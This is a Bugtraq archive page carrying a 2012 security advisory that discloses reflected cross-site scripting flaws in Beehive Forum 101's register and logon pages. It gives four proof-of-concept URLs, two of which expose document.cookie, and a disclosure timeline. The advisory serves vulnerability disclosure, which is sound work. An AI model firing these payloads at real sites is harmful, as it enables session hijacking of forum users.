Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Beehive Forum 101 Multiple XSS vulnerabilities

From: sschurtz () darksecurity de
Date: Sun, 15 Jan 2012 17:07:05 GMT
Advisory:               Beehive Forum 101 Multiple XSS vulnerabilities
Advisory ID:            SSCHADV2011-042
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on Beehive Forum 101
Vendor URL:             http://www.beehiveforum.co.uk/
Vendor Status:          informed

==========================
Vulnerability Description
==========================

Beehive Forum 101 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

// XSS
http://[target]/forum/register.php?'";</script><script>alert('XSS')</script>
http://[target]/forum/register.php/'";</script><script>alert(document.cookie)</script>
http://[target]/forum/logon.php?'";</script><script>alert('XSS')</script>
http://[target]/forum/logon.php/'";</script><script>alert(document.cookie)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

26-Dec-2011 - vendor informed
29-Dec-2011 - vendor feedback
15-Jan-2011 - no patch available

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/SSCHADV2011-042.txt
Previous By Date Next
Previous By Thread Next

Current thread: